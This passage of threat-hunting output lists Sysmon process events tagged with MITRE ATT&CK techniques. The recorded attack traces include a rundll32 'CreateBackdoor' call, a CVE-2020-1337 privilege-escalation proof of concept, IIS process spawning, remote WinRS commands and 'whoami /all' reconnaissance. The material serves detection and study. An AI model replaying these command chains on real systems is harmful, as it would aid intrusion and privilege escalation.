</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1584766840.502366,2020-03-21T09:00:40.502366+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:39.441933Z"">
</TimeCreated>
<EventRecordID>243568</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:39.417</Data>
<Data Name=""ProcessGuid"">747F3D96-9F77-5E75-0000-001090F32000</Data>
<Data Name=""ProcessId"">2416</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
<Data Name=""ParentProcessId"">4848</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237563.487498,2020-08-12T17:06:03.487498+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:01.637860Z"">
</TimeCreated>
<EventRecordID>342412</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:01.636</Data>
<Data Name=""ProcessGuid"">747F3D96-E939-5F33-0000-0010ACAB0E00</Data>
<Data Name=""ProcessId"">7852</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e</Data>
<Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
<Data Name=""LogonId"">0x41c24</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
<Data Name=""ParentProcessId"">7820</Data>
<Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
<Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Detect IIS/Exchange Exploitation,1558885676.667118,2019-05-26T19:47:56.667118+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\notepad.exe) and commandline ( C:\Windows\System32\notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-26T15:47:56.667118Z"">
</TimeCreated>
<EventRecordID>5408</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-26 15:47:56.627</Data>
<Data Name=""ProcessGuid"">365ABB72-B52C-5CEA-0000-00107A0D1100</Data>
<Data Name=""ProcessId"">3388</Data>
<Data Name=""Image"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Notepad</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B26B-5CEA-0000-0010582A0800</Data>
<Data Name=""ParentProcessId"">2744</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034897.447948,2020-01-15T00:48:17.447948+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:17.412145Z"">
</TimeCreated>
<EventRecordID>345</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:17.270</Data>
<Data Name=""ProcessGuid"">747F3D96-2911-5E1E-0000-0010D80A7D00</Data>
<Data Name=""ProcessId"">2416</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;cmd.exe&quot; /c notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
<Data Name=""LogonId"">0x7cef82</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
<Data Name=""ParentProcessId"">4448</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c start ms-browser://</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564909835.391457,2019-08-04T13:10:35.391457+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-04T09:10:30.972590Z"">
</TimeCreated>
<EventRecordID>5703</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-04 09:10:30.702</Data>
<Data Name=""ProcessGuid"">747F3D96-A106-5D46-0000-00102425BD03</Data>
<Data Name=""ProcessId"">6604</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-A106-5D46-0000-00107201BD03</Data>
<Data Name=""ParentProcessId"">1380</Data>
<Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot; /name Microsoft.BackupAndRestoreCenter</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237562.552084,2020-08-12T17:06:02.552084+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:06:00.737148Z"">
</TimeCreated>
<EventRecordID>342411</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:06:00.734</Data>
<Data Name=""ProcessGuid"">747F3D96-E938-5F33-0000-00101CA50E00</Data>
<Data Name=""ProcessId"">7836</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
<Data Name=""LogonId"">0x41c24</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
<Data Name=""ParentProcessId"">7820</Data>
<Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
<Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:17.044002Z"">
</TimeCreated>
<EventRecordID>344</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:16.990</Data>
<Data Name=""ProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
<Data Name=""ProcessId"">4448</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /c start ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
<Data Name=""LogonId"">0x7cef82</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
<Data Name=""ParentProcessId"">4612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:17.044002Z"">
</TimeCreated>
<EventRecordID>344</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:16.990</Data>
<Data Name=""ProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
<Data Name=""ProcessId"">4448</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /c start ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
<Data Name=""LogonId"">0x7cef82</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
<Data Name=""ParentProcessId"">4612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:17.044002Z"">
</TimeCreated>
<EventRecordID>344</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:16.990</Data>
<Data Name=""ProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
<Data Name=""ProcessId"">4448</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /c start ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
<Data Name=""LogonId"">0x7cef82</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
<Data Name=""ParentProcessId"">4612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557970296.456891,2019-05-16T05:31:36.456891+04:00,,Threat,Low,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C ipconfig ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-16T01:31:36.454892Z"">
</TimeCreated>
<EventRecordID>17985</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1792"" ThreadID=""2232"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-16 01:31:36.443</Data>
<Data Name=""ProcessGuid"">DFAE8213-BD78-5CDC-0000-001091041300</Data>
<Data Name=""ProcessId"">3136</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.3.9600.16384 (winblue_rtm.130821-1623)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /C ipconfig</Data>
<Data Name=""CurrentDirectory"">C:\Users\administrator\</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""LogonGuid"">DFAE8213-BD78-5CDC-0000-002005FE1200</Data>
<Data Name=""LogonId"">0x12fe05</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3</Data>
<Data Name=""ParentProcessGuid"">DFAE8213-BD78-5CDC-0000-0010C7FE1200</Data>
<Data Name=""ParentProcessId"">3948</Data>
<Data Name=""ParentImage"">C:\Windows\System32\winrshost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\WinrsHost.exe -Embedding</Data>
</EventData>
</Event>",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /all) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-29T20:59:22.144046Z"">
</TimeCreated>
<EventRecordID>8050</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1896"" ThreadID=""1820"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-29 20:59:22.128</Data>
<Data Name=""ProcessGuid"">365ABB72-65AA-5CC7-0000-00104D882400</Data>
<Data Name=""ProcessId"">2116</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
